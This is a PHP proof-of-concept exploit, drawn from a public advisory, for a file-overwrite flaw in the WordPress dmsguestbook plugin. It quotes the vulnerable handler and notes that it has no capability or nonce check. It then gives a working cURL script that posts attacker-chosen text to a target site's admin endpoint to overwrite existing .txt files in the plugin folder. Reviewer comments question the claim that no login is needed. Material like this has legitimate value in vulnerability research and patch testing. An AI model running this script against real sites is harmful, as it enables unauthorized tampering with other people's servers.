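<?php
/*
 * Source:  http://packetstormsecurity.com/user/evex/
 * Author:  Evex
 * Title:   WordPress dmsguestbook Plugin File Manipulation
 *
 * Description:
 * The WordPress dmsguestbook plugin is vulnerable to a file-manipulation
 * issue: its "save_advanced_data" handler overwrites the contents of
 * existing text files inside the plugin directory with attacker-supplied
 * data. The advisory describes the attacker as unauthenticated.
 *
 * NOTE(review): the PoC below posts to /wp-admin/admin.php, which WordPress
 * normally answers with a redirect to wp-login.php for anonymous clients, so
 * the "unauthenticated" claim only holds if the plugin processes the POST
 * before WordPress's admin-auth check (e.g. on plugin load). Confirm against
 * the affected plugin version; the script below reports a redirect so this
 * is visible when testing.
 *
 * Vulnerable code (as quoted in the advisory, reformatted):
 *
 *   if ($POSTVARIABLE['action'] =='save_advanced_data') {
 *       $abspath = str_replace("\\","/", ABSPATH);
 *       // check the folder variable
 *       if($POSTVARIABLE['folder']=="language/"){ $folder="language/"; } else {$folder="";}
 *       // check the file variable xxxx.txt
 *       if(preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file'])==1) { $file=$POSTVARIABLE['file']; } else {$file="";}
 *       clearstatcache();
 *       if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" .$folder . $file)) {
 *           $handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" .$folder . $file, "w");
 *           $writetofile = str_replace("\\", "",$POSTVARIABLE['advanced_data']);
 *           fwrite($handle, $writetofile);
 *           fclose($handle);
 *           message("<b>" . __("saved", "dmsguestbook") . "...</b>",300,800);
 *       } else {
 *           message("<br /><b>" . __("File not found!", "dmsguestbook"). "</b>",300,800);
 *       }
 *   }
 *
 * What the quoted code shows:
 *   - There is no capability check and no nonce around the write.
 *   - `folder` is limited to "" or "language/", and `file` must match
 *     /^[a-z0-9]+\.+(txt)/i. The pattern has no end anchor, but the write
 *     is gated on file_exists(), so only paths that already exist can be
 *     overwritten (e.g. readme.txt) -- new files cannot be created.
 *   - The content is written verbatim except that backslashes are removed
 *     by str_replace("\\", "", ...) before fwrite().
 */

/** Default target WordPress base URL (no trailing slash needed); CLI argument 1 overrides it. */
define('DMS_DEFAULT_URL', 'http://localhost/x/wordpress');
/** Default file to overwrite, relative to wp-content/plugins/dmsguestbook/; CLI argument 2 overrides it. */
define('DMS_DEFAULT_FILE', 'readme.txt'); #localhost/wp-content/plugins/dmsguestbook/readme.txt
/** Default text to write into the file; CLI argument 3 overrides it. */
define('DMS_DEFAULT_TEXT', 'INPUT TEXT HERE');

/**
 * Build the application/x-www-form-urlencoded body the vulnerable handler reads.
 *
 * Every value is percent-encoded, so a payload containing '&', '=', '+' or
 * '%' reaches the server intact. The original PoC concatenated the raw
 * strings into the body, which would have split the request on those
 * characters. Remember that the server strips backslashes from the text.
 *
 * @param string $file Target file name (must match the plugin's /^[a-z0-9]+\.+(txt)/i filter).
 * @param string $text Content to write.
 * @return string      Encoded POST body.
 */
function dmsguestbook_post_body($file, $text)
{
    return http_build_query(array(
        'action'        => 'save_advanced_data',
        'file'          => $file,
        'advanced_data' => $text,
    ), '', '&');
}

/**
 * POST the payload to the plugin's admin page.
 *
 * Redirects are deliberately NOT followed: a 3xx to wp-login.php means the
 * request was stopped by WordPress's admin auth wall rather than handled.
 *
 * @param string $baseUrl WordPress base URL, e.g. http://host/wordpress
 * @param string $file    Target file name.
 * @param string $text    Content to write.
 * @return array          array(int $httpStatus, string $responseBody)
 * @throws RuntimeException when cURL cannot be initialised or the transfer fails.
 */
function dmsguestbook_send($baseUrl, $file, $text)
{
    $ch = curl_init();
    if ($ch === false) {
        throw new RuntimeException('curl_init() failed');
    }
    curl_setopt_array($ch, array(
        CURLOPT_URL            => rtrim($baseUrl, '/') . '/wp-admin/admin.php?page=dmsguestbook',
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => dmsguestbook_post_body($file, $text),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,
        // Bounded timeouts so a dead host does not hang the script forever.
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 30,
    ));
    $body   = curl_exec($ch);
    $status = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $error  = curl_error($ch);
    curl_close($ch);

    if ($body === false) {
        throw new RuntimeException('Request failed: ' . $error);
    }
    return array($status, $body);
}

/**
 * Script entry point.
 *
 * @param array $argv CLI arguments: [1] base URL, [2] file, [3] text (all optional).
 * @return int        Process exit code: 0 when the request was sent, 1 on transport error.
 */
function dmsguestbook_main(array $argv)
{
    $url  = isset($argv[1]) ? $argv[1] : DMS_DEFAULT_URL;
    $file = isset($argv[2]) ? $argv[2] : DMS_DEFAULT_FILE;
    $text = isset($argv[3]) ? $argv[3] : DMS_DEFAULT_TEXT;

    try {
        list($status, $body) = dmsguestbook_send($url, $file, $text);
    } catch (RuntimeException $e) {
        echo 'Error: ' . $e->getMessage() . "\n";
        return 1;
    }

    // The original script printed "Payload Sent" unconditionally; keep that
    // line but add the evidence needed to tell success from a login redirect
    // or a missing target file.
    echo "Payload Sent\nUrl: " . rtrim($url, '/') . "/wp-content/plugins/dmsguestbook/{$file}\n";
    echo "HTTP status: {$status}\n";
    if ($status >= 300 && $status < 400) {
        echo "Note: response was a redirect -- the request probably hit the WordPress login wall, not the handler\n";
    } elseif (strpos($body, 'File not found') !== false) {
        echo "Note: target reported 'File not found' -- the file must already exist under the plugin directory\n";
    }
    return 0;
}

// Run only when this file is executed directly (CLI or web SAPI), not when included.
if (isset($_SERVER['SCRIPT_FILENAME']) && realpath($_SERVER['SCRIPT_FILENAME']) === __FILE__) {
    exit(dmsguestbook_main(isset($argv) ? $argv : array()));
}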